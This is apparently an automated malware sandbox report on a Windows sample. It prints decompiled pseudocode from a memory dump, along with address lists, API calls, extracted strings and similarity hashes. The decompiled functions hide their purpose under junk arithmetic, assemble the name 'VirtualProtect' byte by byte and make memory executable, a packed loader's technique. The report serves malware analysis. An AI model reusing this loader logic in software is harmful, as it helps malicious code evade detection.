				_v172 = _v172 - 0x46cc3ebc;
				_v884 = _v884 - 0x3ca60054;
				_v408 = _v408 - 0x6714650b;
				_v1128 = _v1128 + 0x2706d440;
				_v300 = _v300 - 0x608ee916;
				_v300 = _v300 + 0x20b6a50d;
				_v708 = _v708 - 0x7f2cf566;
				_v892 = _v892 - 0x16e243ac;
				_v720 = _v720 + 0x49f4a578;
				_v164 = _v164 + 0x68176734;
				_v408 = _v408 + 0x9cdac3;
				_v884 = _v884 + 0x25ce936;
				_v308 = _v308 + 0x163a22ac;
				_v884 = _v884 + 0x422c8364;
				_v892 = _v892 - 0x1113e9f7;
				_v300 = _v300 - 0x206e8e52;
				_v420 = _v420 + 0x2024de60;
				_v256 = _v256 + 0x7fcf4ce0;
				_v1128 = _v1128 - 0x81d68bc;
				_v900 = _v900 - 0x3daee9e8;
				_v716 = _v716 + 0xcb1bb09;
				_v436 = _v436 + 0x5d058387;
				_v308 = _v308 + 0x425bb182;
				_v172 = _v172 - 0x223f49dc;
				_v52 = _v52 - 0x3a973de6;
				_v420 = _v420 + 0x588dd233;
				_v908 = _v908 - 0x46ad44c4;
				_v1068 = _v1068 + 0x18ec1f3c;
				_v180 = _v180 + 0x11b4f3a1;
				_v816 = _v816 - 0x9360dfa;
				_v44 = _v44 + 0x3bc4850;
				_v1060 = _v1060 + 0x3fc32911;
				_v816 = _v816 - 0x5c7afcf4;
				_v52 = _v52 + 0x381fff7e;
				_v436 = _v436 - 0x5397bd3;
				_v288 = _v288 + 0x23d928b;
				_v464 = _v464 - 0x285cfe64;
				_v716 = _v716 + 0x2eb3a24e;
				_v420 = _v420 + 0x4ad506d2;
				_v1068 = _v1068 - 0x280ca9b1;
				_v288 = _v288 + 0x1d7da27a;
				_v920 = _v920 + 0x39ae4f86;
				_v1128 = _v1128 + 0x3bae3684;
				_v708 = _v708 + 0x319c6713;
				_v428 = _v428 - 0x5ee7d8f4;
				_v420 = _v420 + 0x7c8a205d;
				_v1016 = _v1016 + 0x8260d2e;
				_v884 = _v884 - 0x58badc6b;
				_v408 = _v408 + 0x5c251ab0;
				_v308 = _v308 + 0x26e7f284;
				_v512 = _v512 + 0x3622c198;
				_v700 = _v700 - 0x4331064d;
				_v1144 = _v1144 + 0x196ab841;
				_v308 = _v308 - 0x6ccd4fc1;
				_v44 = _v44 - 0x50573bc2;
				_v208 = _v208 - 0x4f724783;
				_v164 = _v164 + 0x1f392d37;
				_v256 = _v256 + 0x517d7f70;
				_v616 = _v616 + 0x4ea86d2;
				_v208 = _v208 - 0x337ac75d;
				_v740 = _v740 + 0x3ac533a0;
				_v716 = _v716 + 0x576c8f92;
				_v512 = _v512 - 0x73e959b4;
				_v308 = _v308 + 0x26052a49;
				_v716 = _v716 - 0x2a7f4b76;
				_v1296 = _v1296 - 0x28fec13f;
				_v52 = _v52 + 0x1f2a008d;
				_v892 = _v892 - 0x5809c051;
				_v708 = _v708 + 0x344abe69;
				_v444 = _v444 - 0x137c90f8;
				_v920 = _v920 + 0x48728065;
				_v256 = _v256 - 0x4546c3b4;
				_v288 = _v288 - 0xb09baff;
				_v1136 = _v1136 + 0x3a0cc1d4;
				_v208 = _v208 - 0x7cc685d;
				_v1060 = _v1060 - 0x74be053a;
				_v916 = _v916 + 0x6a633f02;
				_v908 = _v908 + 0x366d47a7;
				_v316 = _v316 - 0x18e5d8af;
				_v616 = _v616 + 0x2b8fa57e;
				_v172 = _v172 + 0x20189a7f;
				_v724 = _v724 - 0x294e8bba;
				_v340 = _v340 + 0x37c66b51;
				_v932 = _v932 - 0x4cf91d4f;
				_v1224 = _v1224 - 0x2916cd44;
				_v1144 = _v1144 + 0x56ca55d4;
				_v1076 = _v1076 + 0x3375cc;
				_v464 = _v464 - 0x2a04f1a5;
				_v920 = _v920 - 0x632009c5;
				_v288 = _v288 + 0xa72f039;
				_v1224 = _v1224 - 0x78260375;
				_v824 = _v824 - 0x763098cf;
				_v740 = _v740 - 0x79bac24c;
				_v892 = _v892 + 0x70b8e7e1;
				_v920 = _v920 - 0x7d372d81;
				_v44 = _v44 - 0x51506ada;
				_v708 = _v708 + 0x3d94dea1;
				_v8 = _v8 + 0x45eea711;
				_v924 = _v924 - 0x63444b19;
				_v824 = _v824 + 0x4cdfc47b;
				_v420 = _v420 + 0x1d1a1a26;
				_v464 = _v464 + 0x6733802c;
				_v180 = _v180 - 0x6a948b57;
				_v368 = _v368 + 0x757f7fb1;
				_v464 = _v464 + 0x58b237cf;
				_v420 = _v420 + 0xf2db373;
				_v808 = _v808 - 0x6d98dcdb;
				_v512 = _v512 - 0x37f41803;
				_v916 = _v916 + 0x3d1e63ca;
				_v184 = _v184 + 0x4e27d44e;
				_v68 = _v68 + 0x6ac6d77a;
				"VirtualProtect" = "VirtualProtect" + 0xf6;
				"rotect" = "rotect" + 0xf6;
				 *0x448a53 = 0x6365;
				 *0x448a55 = 0x74;
				M00448A4D = 0x6c61;
				 *0x448a52 = 0x74;
				"rtualProtect" = 0x7472;
				M00448A4C = 0x75;
				M00448A49 = 0x69;
				 *0x448a44 = GetProcAddress( *0x4c449c, _t1565);
				_t1483 = VirtualProtect( *0x4c14a4,  *0x4c4ea4, 0x40,  &_v1324); // executed
				return _t1483;
			}

0x0041abc7
0x0041abd0
0x0041abd7
0x0041abe0
0x0041abe7
0x0041abee
0x0041abf9
0x0041ac04
0x0041ac0f
0x0041ac1a
0x0041ac25
0x0041ac30
0x0041ac3b
0x0041ac46
0x0041ac51
0x0041ac5c
0x0041ac67
0x0041ac72
0x0041ac7d
0x0041ac88
0x0041ac93
0x0041ac9e
0x0041aca9
0x0041acb4
0x0041acbf
0x0041acca
0x0041acd5
0x0041ace0
0x0041aceb
0x0041acf6
0x0041ad01
0x0041ad0c
0x0041ad17
0x0041ad22
0x0041ad2d
0x0041ad38
0x0041ad43
0x0041ad4e
0x0041ad59
0x0041ad64
0x0041ad6f
0x0041ad7a
0x0041ad85
0x0041ad90
0x0041ad9b
0x0041ada6
0x0041adb1
0x0041adbc
0x0041adc7
0x0041add2
0x0041addd
0x0041ade8
0x0041adf3
0x0041adfb
0x0041ae06
0x0041ae11
0x0041ae1c
0x0041ae27
0x0041ae32
0x0041ae3d
0x0041ae48
0x0041ae53
0x0041ae5e
0x0041ae69
0x0041ae74
0x0041ae7f
0x0041ae8a
0x0041ae95
0x0041ae9d
0x0041aea8
0x0041aeb3
0x0041aebe
0x0041aec9
0x0041aed4
0x0041aedf
0x0041aeea
0x0041aef5
0x0041aefd
0x0041af08
0x0041af13
0x0041af1e
0x0041af29
0x0041af34
0x0041af3f
0x0041af4a
0x0041af55
0x0041af60
0x0041af6b
0x0041af76
0x0041af81
0x0041af8c
0x0041af97
0x0041afa2
0x0041afad
0x0041afb8
0x0041afc3
0x0041afce
0x0041afd9
0x0041afe1
0x0041afe9
0x0041aff4
0x0041affc
0x0041b004
0x0041b00f
0x0041b01a
0x0041b025
0x0041b030
0x0041b03b
0x0041b046
0x0041b051
0x0041b05c
0x0041b067
0x0041b072
0x0041b07d
0x0041b088
0x0041b093
0x0041b09e
0x0041b0a9
0x0041b0b4
0x0041b0bf
0x0041b0ca
0x0041b0d5
0x0041b0dd
0x0041b0e8
0x0041b0f3
0x0041b0fe
0x0041b109
0x0041b111
0x0041b11c
0x0041b127
0x0041b132
0x0041b13d
0x0041b148
0x0041b153
0x0041b15e
0x0041b169
0x0041b174
0x0041b17f
0x0041b18a
0x0041b195
0x0041b1a0
0x0041b1ab
0x0041b1b6
0x0041b1c1
0x0041b1c9
0x0041b1d4
0x0041b1dc
0x0041b1e7
0x0041b1f2
0x0041b1fa
0x0041b205
0x0041b210
0x0041b218
0x0041b223
0x0041b22b
0x0041b236
0x0041b241
0x0041b24c
0x0041b257
0x0041b262
0x0041b26d
0x0041b278
0x0041b283
0x0041b28e
0x0041b299
0x0041b2a4
0x0041b2af
0x0041b2ba
0x0041b2c5
0x0041b2f6
0x0041b301
0x0041b345
0x0041b350
0x0041b35b
0x0041b38c
0x0041b3aa
0x0041b3b5
0x0041b3c0
0x0041b3cb
0x0041b422
0x0041b440
0x0041b44b
0x0041b469
0x0041b474
0x0041b4a5
0x0041b4b0
0x0041b4bb
0x0041b4c6
0x0041b4d1
0x0041b4dc
0x0041b4fa
0x0041b505
0x0041b523
0x0041b52e
0x0041b539
0x0041b544
0x0041b54f
0x0041b56d
0x0041b58b
0x0041b596
0x0041b5a1
0x0041b5bf
0x0041b5ca
0x0041b5fb
0x0041b606
0x0041b611
0x0041b61c
0x0041b627
0x0041b645
0x0041b650
0x0041b65b
0x0041b6a4
0x0041b6aa
0x0041b6b1
0x0041b6bb
0x0041b6c8
0x0041b6cd
0x0041b6d4
0x0041b6db
0x0041b6e4
0x0041b6eb
0x0041b6f6
0x0041b701
0x0041b70c
0x0041b717
0x0041b722
0x0041b72d
0x0041b738
0x0041b743
0x0041b74e
0x0041b759
0x0041b764
0x0041b76f
0x0041b77a
0x0041b782
0x0041b78d
0x0041b798
0x0041b7a3
0x0041b7ae
0x0041b7b9
0x0041b7c4
0x0041b7cf
0x0041b7da
0x0041b7e5
0x0041b7f0
0x0041b7fb
0x0041b806
0x0041b811
0x0041b81c
0x0041b827
0x0041b832
0x0041b83d
0x0041b848
0x0041b853
0x0041b85e
0x0041b869
0x0041b874
0x0041b87f
0x0041b88a
0x0041b895
0x0041b8a0
0x0041b8ab
0x0041b8b6
0x0041b8c1
0x0041b8cc
0x0041b8d4
0x0041b8df
0x0041b8ea
0x0041b8f5
0x0041b900
0x0041b90b
0x0041b916
0x0041b921
0x0041b92c
0x0041b937
0x0041b942
0x0041b94d
0x0041b958
0x0041b963
0x0041b96b
0x0041b976
0x0041b981
0x0041b98c
0x0041b997
0x0041b99f
0x0041b9aa
0x0041b9b5
0x0041b9bd
0x0041b9c8
0x0041b9d3
0x0041b9db
0x0041b9e6
0x0041b9f1
0x0041b9fc
0x0041ba07
0x0041ba12
0x0041ba1d
0x0041ba28
0x0041ba33
0x0041ba3e
0x0041ba49
0x0041ba54
0x0041ba5f
0x0041ba6a
0x0041ba75
0x0041ba80
0x0041ba8b
0x0041ba96
0x0041baa1
0x0041baac
0x0041bab7
0x0041bac2
0x0041baca
0x0041bad5
0x0041bae0
0x0041baeb
0x0041baf6
0x0041bafe
0x0041bb09
0x0041bb14
0x0041bb1f
0x0041bb2a
0x0041bb35
0x0041bb40
0x0041bb4b
0x0041bb56
0x0041bb61
0x0041bb6c
0x0041bb77
0x0041bb7f
0x0041bb87
0x0041bb8f
0x0041bb97
0x0041bba2
0x0041bbad
0x0041bbb8
0x0041bbc3
0x0041bbce
0x0041bbd9
0x0041bbe1
0x0041bbec
0x0041bbf7
0x0041bc02
0x0041bc0a
0x0041bc15
0x0041bc20
0x0041bc2b
0x0041bc36
0x0041bc41
0x0041bc4c
0x0041bc57
0x0041bc62
0x0041bc6d
0x0041bc78
0x0041bc83
0x0041bc8e
0x0041bc99
0x0041bca4
0x0041bcaf
0x0041bcba
0x0041bcc5
0x0041bcd0
0x0041bcdb
0x0041bce6
0x0041bcf1
0x0041bcfc
0x0041bd07
0x0041bd12
0x0041bd1d
0x0041bd25
0x0041bd30
0x0041bd3b
0x0041bd46
0x0041bd51
0x0041bd5c
0x0041bd67
0x0041bd72
0x0041bd7d
0x0041bd88
0x0041bd93
0x0041bd9e
0x0041bda9
0x0041bdb1
0x0041bdbc
0x0041bdc7
0x0041bdd2
0x0041bddd
0x0041bde8
0x0041bdf3
0x0041bdfe
0x0041be09
0x0041be27
0x0041be32
0x0041be3d
0x0041be6e
0x0041be79
0x0041be84
0x0041bea2
0x0041bead
0x0041beb8
0x0041bec3
0x0041bee1
0x0041beec
0x0041bef7
0x0041bf22
0x0041bf2d
0x0041bf38
0x0041bf43
0x0041bf4e
0x0041bf59
0x0041bf77
0x0041bf82
0x0041bf8d
0x0041bfd1
0x0041bfdc
0x0041bfe7
0x0041bff2
0x0041c010
0x0041c01b
0x0041c026
0x0041c03e
0x0041c049
0x0041c054
0x0041c05f
0x0041c06a
0x0041c075
0x0041c093
0x0041c09e
0x0041c0a9
0x0041c0b4
0x0041c0bf
0x0041c0ca
0x0041c0e8
0x0041c106
0x0041c137
0x0041c142
0x0041c160
0x0041c191
0x0041c19c
0x0041c1a7
0x0041c1b2
0x0041c1bd
0x0041c1ee
0x0041c20c
0x0041c217
0x0041c235
0x0041c253
0x0041c25e
0x0041c269
0x0041c274
0x0041c27f
0x0041c28a
0x0041c295
0x0041c2d9
0x0041c2e4
0x0041c2ef
0x0041c30d
0x0041c32b
0x0041c336
0x0041c341
0x0041c34c
0x0041c357
0x0041c375
0x0041c380
0x0041c3c4
0x0041c3cf
0x0041c3da
0x0041c3e5
0x0041c3f0
0x0041c3fb
0x0041c406
0x0041c424
0x0041c468
0x0041c470
0x0041c47b
0x0041c499
0x0041c4a4
0x0041c4af
0x0041c4da
0x0041c4e5
0x0041c4f0
0x0041c50e
0x0041c519
0x0041c54a
0x0041c555
0x0041c573
0x0041c57e
0x0041c589
0x0041c594
0x0041c59f
0x0041c5bd
0x0041c5d5
0x0041c5dd
0x0041c5e8
0x0041c5f3
0x0041c5fe
0x0041c609
0x0041c614
0x0041c61c
0x0041c627
0x0041c645
0x0041c663
0x0041c66e
0x0041c679
0x0041c697
0x0041c6b5
0x0041c6c0
0x0041c6cb
0x0041c6d6
0x0041c6e1
0x0041c6ec
0x0041c6f7
0x0041c702
0x0041c70d
0x0041c718
0x0041c723
0x0041c741
0x0041c74c
0x0041c757
0x0041c75e
0x0041c76c
0x0041c775
0x0041c77c
0x0041c785
0x0041c78c
0x0041c795
0x0041c79c
0x0041c7b6
0x0041c7c1
0x0041c7ca

APIs

LoadLibraryA.KERNEL32(VirtualProtect,1C0DF3A3,7C40CAE6,711BD0C6,7FB643C2,04725625,711BD0C6,57E61415,14A24D41,23078573,08FD9208,4231ABF7,336CC1CC,65544FFF,1BB610E6,31DCA6E7), ref: 0041B6C2
GetProcAddress.KERNEL32(?,5BC4A701), ref: 0041C7A3
VirtualProtect.KERNELBASE(00000040,?,?,5BC4A701,?,7D372D81,3DAEE9E8,?,?,74BE053A,?,74BE053A,1F2A008D,?,?,?), ref: 0041C7C1

Strings

H/P, xrefs: 0041C0F3
1s<R, xrefs: 0041B58B
N%z", xrefs: 0041B1DC
qcc-, xrefs: 0041B332
FW,(, xrefs: 0041B827
p0SP, xrefs: 0041B0B4
/><, xrefs: 0041B2AF
SKCo, xrefs: 0041AEDF
VirtualProtect, xrefs: 0041B6A4, 0041B6A9, 0041C765
*9ix, xrefs: 0041B5FB
Ig, xrefs: 0041BE09
IkL, xrefs: 0041AFA2
CWv, xrefs: 0041B7C4
JfG, xrefs: 0041AD4E
9o, xrefs: 0041B895
|~, xrefs: 0041BB35
k/^, xrefs: 0041BC62
(::L, xrefs: 0041AFB8
PV, xrefs: 0041BB61
*E[o, xrefs: 0041AFD9
kOon, xrefs: 0041AED4
R$#, xrefs: 0041B31F
Dx8|, xrefs: 0041B7A3
Sst1, xrefs: 0041B046
=:6U, xrefs: 0041B1D4
g$0, xrefs: 0041B94D
[(, xrefs: 0041C0DA
lh;_, xrefs: 0041B798
[qFq, xrefs: 0041B00F
>e] , xrefs: 0041BD5C
w/a, xrefs: 0041B241
y]n6, xrefs: 0041BC6D
F[x`, xrefs: 0041B0E8
T, xrefs: 0041BF4E

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProcProtectVirtual
String ID: w/a$g$0$PV$(::L$*9ix$*E[o$/><$1s<R$=:6U$>e] $Dx8|$FW,($F[x`$IkL$Ig$JfG$N%z"$R$#$SKCo$Sst1$T$VirtualProtect$[qFq$[($k/^$kOon$lh;_$p0SP$qcc-$y]n6$9o$CWv$H/P$|~
API String ID: 3509694964-66855312
Opcode ID: b139ac1e9054ea2645c328be7262c22c2896cf5e0288f0d10ee5ab34f6593165
Instruction ID: bfd354acee242b0984794cd3d0603bde2ede98e52b69de687bf394e6cb4df517
Opcode Fuzzy Hash: b139ac1e9054ea2645c328be7262c22c2896cf5e0288f0d10ee5ab34f6593165
Instruction Fuzzy Hash: BCC2D8B45093C08BC2B58F1A85897CFFBE4BF95718F508A0CE6D95A611CB718A85CF4B

Uniqueness

Uniqueness Score: -1.00%

Function 0041BAA1, Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 391
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BAA1(long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, void* _a40, intOrPtr _a44, void* _a68, intOrPtr _a88, intOrPtr _a96, intOrPtr _a104, intOrPtr _a160, intOrPtr _a164, intOrPtr _a168, intOrPtr _a172, intOrPtr _a180, intOrPtr _a184, intOrPtr _a188, intOrPtr _a192, intOrPtr _a196, intOrPtr _a200, intOrPtr _a204, intOrPtr _a212, intOrPtr _a220, intOrPtr _a228, intOrPtr _a252, intOrPtr _a260, intOrPtr _a268, intOrPtr _a272, intOrPtr _a280, intOrPtr _a288, intOrPtr _a312, intOrPtr _a360, intOrPtr _a364, intOrPtr _a368, intOrPtr _a372, intOrPtr _a380, void* _a384, intOrPtr _a388, void* _a392, intOrPtr _a396, intOrPtr _a404, intOrPtr _a408, intOrPtr _a412, intOrPtr _a420, intOrPtr _a428, intOrPtr _a436, intOrPtr _a444, intOrPtr _a452, intOrPtr _a464, intOrPtr _a472, void* _a496, intOrPtr _a504, intOrPtr _a512, intOrPtr _a520, intOrPtr _a548, intOrPtr _a556, intOrPtr _a560, intOrPtr _a564, intOrPtr _a568, intOrPtr _a572, intOrPtr _a576, intOrPtr _a584, intOrPtr _a588, void* _a596, intOrPtr _a604, intOrPtr _a608, intOrPtr _a612, intOrPtr _a620, intOrPtr _a628, intOrPtr _a656, intOrPtr _a664, intOrPtr _a672, void* _a680, intOrPtr _a704, intOrPtr _a708, intOrPtr _a712, intOrPtr _a716, void* _a724, intOrPtr _a744, void* _a760, intOrPtr _a800, intOrPtr _a816, intOrPtr _a844, intOrPtr _a848, intOrPtr _a852, intOrPtr _a860, intOrPtr _a864, intOrPtr _a868, intOrPtr _a884, intOrPtr _a892, intOrPtr _a896, intOrPtr _a900, intOrPtr _a908, intOrPtr _a920, intOrPtr _a944, intOrPtr _a952, intOrPtr _a960, intOrPtr _a964, intOrPtr _a972, intOrPtr _a988, intOrPtr _a992, intOrPtr _a1000, intOrPtr _a1012, intOrPtr _a1016, intOrPtr _a1020, intOrPtr _a1028, intOrPtr _a1040, intOrPtr _a1064, intOrPtr _a1072, intOrPtr _a1100, intOrPtr _a1108, intOrPtr _a1112, intOrPtr _a1116, intOrPtr _a1120, intOrPtr _a1124, intOrPtr _a1136, intOrPtr _a1144, intOrPtr _a1148, intOrPtr _a1156, intOrPtr _a1160, intOrPtr _a1164, intOrPtr _a1192, intOrPtr _a1220, intOrPtr _a1228, intOrPtr _a1232, intOrPtr _a1236, intOrPtr _a1244, intOrPtr _a1252, intOrPtr _a1260, intOrPtr _a1264, intOrPtr _a1276, intOrPtr _a1284, intOrPtr _a1288, intOrPtr _a1320) {
				int _t874;
				CHAR* _t929;

				_a228 = 0x2af06a43;
				_a1260 = 0x7374b303;
				_a288 = 0x5bc4a701;
				_a44 = 0x49139c63;
				_a868 = 0x74cb6ce2;
				_a1288 = 0x5ded0cc0;
				_a1000 = 0x5dcd5be2;
				_a220 = 0x64031bd0;
				_a36 = 0x2d276eb8;
				_a572 = 0x2c59c4d0;
				_a1252 = 0x4f20af0e;
				_a1232 = 0x365c19ac;
				_a1112 = 0x7f535e31;
				_a388 = 0xdedcc97;
				_a972 = 0x7e0a7ced;
				_a212 = 0x687fa226;
				_a716 = 0x46f40653;
				_a1244 = 0x317ebda5;
				_a1236 = 0x56e7500d;
				_a848 = 0x6b33b020;
				_a28 = 0x366f6df3;
				_a96 = 0x32beea86;
				_a20 = 0x228d1197;
				_a12 = 0x7693296c;
				_a584 = 0x3b04cb38;
				_a860 = 0x4c011a5c;
				_a1064 = 0x244a45b6;
				_a380 = 0x48ea128;
				_a1124 = 0x261e5791;
				_a280 = 0x527c0faa;
				_a8 = 0x164ede6a;
				_a168 = 0xeff6b27;
				_a372 = 0x8200a32;
				_a952 = 0x24b90350;
				_a24 = 0x32627711;
				_a1016 = 0x60c84633;
				_a1228 = 0x2efddde7;
				_a576 = 0x43df52f7;
				_a368 = 0xf7a1ec1;
				_a1116 = 0x6d86c563;
				_a1136 = 0x66efffe0;
				_a564 = 0x45a58dc6;
				_a204 = 0x26c95977;
				_a800 = 0x5eea2f6b;
				_a708 = 0x366e5d79;
				_a664 = 0xd97024e;
				_a568 = 0x219e4665;
				_a744 = 0x5769e212;
				_a272 = 0x7f468728;
				_a196 = 0x34b8882e;
				_a472 = 0x37afd529;
				_a188 = 0x60dcc09d;
				_a180 = 0x1ca13abd;
				_a1220 = 0x6d9a90fb;
				_a1264 = 0x3574052d;
				_a1108 = 0x1586a809;
				_a896 = 0x4efa0c39;
				_a672 = 0x5687f46f;
				_a992 = 0x618934ef;
				_a464 = 0x68873377;
				_a16 = 0x7404d5d1;
				_a556 = 0x57a121ab;
				_a964 = 0x17aa24c0;
				_a944 = 0x25cb89cb;
				_a852 = 0x531bc81b;
				_a1160 = 0x639cc778;
				_a1192 = 0x205d653e;
				_a548 = 0x4e48f17c;
				_a656 = 0x5e0f6ffa;
				_a364 = 0x4393df35;
				_a844 = 0x40f13569;
				_a360 = 0x210b0adf;
				_a172 = 0x69c97e0e;
				_a88 = 0x7d8d0db1;
				_a160 = 0x3c11c155;
				_a164 = 0x775f088f;
				_a1100 = 0x106c3386;
				_a704 = 0x687a8d1a;
				_a560 = 0x7f0b5f93;
				_a1072 = _a1072 - 0x185b168d;
				_a1072 = _a1072 - 0x6c912c6c;
				_a452 = _a452 - 0x17f7c305;
				_a1028 = _a1028 - 0x67e2e549;
				_a920 = _a920 - 0x2bf52b48;
				_a1164 = _a1164 - 0x16e1b59f;
				_a1164 = _a1164 - 0x3942d78e;
				_a428 = _a428 - 0x3c31dc6d;
				_a920 = _a920 - 0x206fcf0;
				_a1072 = _a1072 + 0x462a15c5;
				_a1072 = _a1072 - 0x7fa0dc60;
				_a628 = _a628 + 0x12aa4ad1;
				_a1028 = _a1028 + 0x62157c4d;
				_a1072 = _a1072 - 0x35591a9c;
				_a520 = _a520 - 0x75a28f2;
				_a428 = _a428 + 0x52aee917;
				_a1028 = _a1028 - 0x243787a8;
				_a1156 = _a1156 - 0x4b1a50d9;
				_a436 = _a436 - 0x62c5a066;
				_a520 = _a520 - 0x28e9e75b;
				_a1156 = _a1156 - 0x46cc3ebc;
				_a444 = _a444 - 0x3ca60054;
				_a920 = _a920 - 0x6714650b;
				_a200 = _a200 + 0x2706d440;
				_a1028 = _a1028 - 0x608ee916;
				_a1028 = _a1028 + 0x20b6a50d;
				_a620 = _a620 - 0x7f2cf566;
				_a436 = _a436 - 0x16e243ac;
				_a608 = _a608 + 0x49f4a578;
				_a1164 = _a1164 + 0x68176734;
				_a920 = _a920 + 0x9cdac3;
				_a444 = _a444 + 0x25ce936;
				_a1020 = _a1020 + 0x163a22ac;
				_a444 = _a444 + 0x422c8364;
				_a436 = _a436 - 0x1113e9f7;
				_a1028 = _a1028 - 0x206e8e52;
				_a908 = _a908 + 0x2024de60;
				_a1072 = _a1072 + 0x7fcf4ce0;
				_a200 = _a200 - 0x81d68bc;
				_a428 = _a428 - 0x3daee9e8;
				_a612 = _a612 + 0xcb1bb09;
				_a892 = _a892 + 0x5d058387;
				_a1020 = _a1020 + 0x425bb182;
				_a1156 = _a1156 - 0x223f49dc;
				_a1276 = _a1276 - 0x3a973de6;
				_a908 = _a908 + 0x588dd233;
				_a420 = _a420 - 0x46ad44c4;
				_a260 = _a260 + 0x18ec1f3c;
				_a1148 = _a1148 + 0x11b4f3a1;
				_a512 = _a512 - 0x9360dfa;
				_a1284 = _a1284 + 0x3bc4850;
				_a268 = _a268 + 0x3fc32911;
				_a512 = _a512 - 0x5c7afcf4;
				_a1276 = _a1276 + 0x381fff7e;
				_a892 = _a892 - 0x5397bd3;
				_a1040 = _a1040 + 0x23d928b;
				_a864 = _a864 - 0x285cfe64;
				_a612 = _a612 + 0x2eb3a24e;
				_a908 = _a908 + 0x4ad506d2;
				_a260 = _a260 - 0x280ca9b1;
				_a1040 = _a1040 + 0x1d7da27a;
				_a408 = _a408 + 0x39ae4f86;
				_a200 = _a200 + 0x3bae3684;
				_a620 = _a620 + 0x319c6713;
				_a900 = _a900 - 0x5ee7d8f4;
				_a908 = _a908 + 0x7c8a205d;
				_a312 = _a312 + 0x8260d2e;
				_a444 = _a444 - 0x58badc6b;
				_a920 = _a920 + 0x5c251ab0;
				_a1020 = _a1020 + 0x26e7f284;
				_a816 = _a816 + 0x3622c198;
				_a628 = _a628 - 0x4331064d;
				_a184 = _a184 + 0x196ab841;
				_a1020 = _a1020 - 0x6ccd4fc1;
				_a1284 = _a1284 - 0x50573bc2;
				_a1120 = _a1120 - 0x4f724783;
				_a1164 = _a1164 + 0x1f392d37;
				_a1072 = _a1072 + 0x517d7f70;
				_a712 = _a712 + 0x4ea86d2;
				_a1120 = _a1120 - 0x337ac75d;
				_a588 = _a588 + 0x3ac533a0;
				_a612 = _a612 + 0x576c8f92;
				_a816 = _a816 - 0x73e959b4;
				_a1020 = _a1020 + 0x26052a49;
				_a612 = _a612 - 0x2a7f4b76;
				_a32 = _a32 - 0x28fec13f;
				_a1276 = _a1276 + 0x1f2a008d;
				_a436 = _a436 - 0x5809c051;
				_a620 = _a620 + 0x344abe69;
				_a884 = _a884 - 0x137c90f8;
				_a408 = _a408 + 0x48728065;
				_a1072 = _a1072 - 0x4546c3b4;
				_a1040 = _a1040 - 0xb09baff;
				_a192 = _a192 + 0x3a0cc1d4;
				_a1120 = _a1120 - 0x7cc685d;
				_a268 = _a268 - 0x74be053a;
				_a412 = _a412 + 0x6a633f02;
				_a420 = _a420 + 0x366d47a7;
				_a1012 = _a1012 - 0x18e5d8af;
				_a712 = _a712 + 0x2b8fa57e;
				_a1156 = _a1156 + 0x20189a7f;
				_a604 = _a604 - 0x294e8bba;
				_a988 = _a988 + 0x37c66b51;
				_a396 = _a396 - 0x4cf91d4f;
				_a104 = _a104 - 0x2916cd44;
				_a184 = _a184 + 0x56ca55d4;
				_a252 = _a252 + 0x3375cc;
				_a864 = _a864 - 0x2a04f1a5;
				_a408 = _a408 - 0x632009c5;
				_a1040 = _a1040 + 0xa72f039;
				_a104 = _a104 - 0x78260375;
				_a504 = _a504 - 0x763098cf;
				_a588 = _a588 - 0x79bac24c;
				_a436 = _a436 + 0x70b8e7e1;
				_a408 = _a408 - 0x7d372d81;
				_a1284 = _a1284 - 0x51506ada;
				_a620 = _a620 + 0x3d94dea1;
				_a1320 = _a1320 + 0x45eea711;
				_a404 = _a404 - 0x63444b19;
				_a504 = _a504 + 0x4cdfc47b;
				_a908 = _a908 + 0x1d1a1a26;
				_a864 = _a864 + 0x6733802c;
				_a1148 = _a1148 - 0x6a948b57;
				_a960 = _a960 + 0x757f7fb1;
				_a864 = _a864 + 0x58b237cf;
				_a908 = _a908 + 0xf2db373;
				_a520 = _a520 - 0x6d98dcdb;
				_a816 = _a816 - 0x37f41803;
				_a412 = _a412 + 0x3d1e63ca;
				_a1144 = _a1144 + 0x4e27d44e;
				_a1260 = _a1260 + 0x6ac6d77a;
				"VirtualProtect" = "VirtualProtect" + 0xf6;
				"rotect" = "rotect" + 0xf6;
				 *0x448a53 = 0x6365;
				 *0x448a55 = 0x74;
				M00448A4D = 0x6c61;
				 *0x448a52 = 0x74;
				"rtualProtect" = 0x7472;
				M00448A4C = 0x75;
				M00448A49 = 0x69;
				 *0x448a44 = GetProcAddress( *0x4c449c, _t929);
				_t874 = VirtualProtect( *0x4c14a4,  *0x4c4ea4, 0x40,  &_a4); // executed
				return _t874;
			}

0x0041baa1
0x0041baac
0x0041bab7
0x0041bac2
0x0041baca
0x0041bad5
0x0041bae0
0x0041baeb
0x0041baf6
0x0041bafe
0x0041bb09
0x0041bb14
0x0041bb1f
0x0041bb2a
0x0041bb35
0x0041bb40
0x0041bb4b
0x0041bb56
0x0041bb61
0x0041bb6c
0x0041bb77
0x0041bb7f
0x0041bb87
0x0041bb8f
0x0041bb97
0x0041bba2
0x0041bbad
0x0041bbb8
0x0041bbc3
0x0041bbce
0x0041bbd9
0x0041bbe1
0x0041bbec
0x0041bbf7
0x0041bc02
0x0041bc0a
0x0041bc15
0x0041bc20
0x0041bc2b
0x0041bc36
0x0041bc41
0x0041bc4c
0x0041bc57
0x0041bc62
0x0041bc6d
0x0041bc78
0x0041bc83
0x0041bc8e
0x0041bc99
0x0041bca4
0x0041bcaf
0x0041bcba
0x0041bcc5
0x0041bcd0
0x0041bcdb
0x0041bce6
0x0041bcf1
0x0041bcfc
0x0041bd07
0x0041bd12
0x0041bd1d
0x0041bd25
0x0041bd30
0x0041bd3b
0x0041bd46
0x0041bd51
0x0041bd5c
0x0041bd67
0x0041bd72
0x0041bd7d
0x0041bd88
0x0041bd93
0x0041bd9e
0x0041bda9
0x0041bdb1
0x0041bdbc
0x0041bdc7
0x0041bdd2
0x0041bddd
0x0041bde8
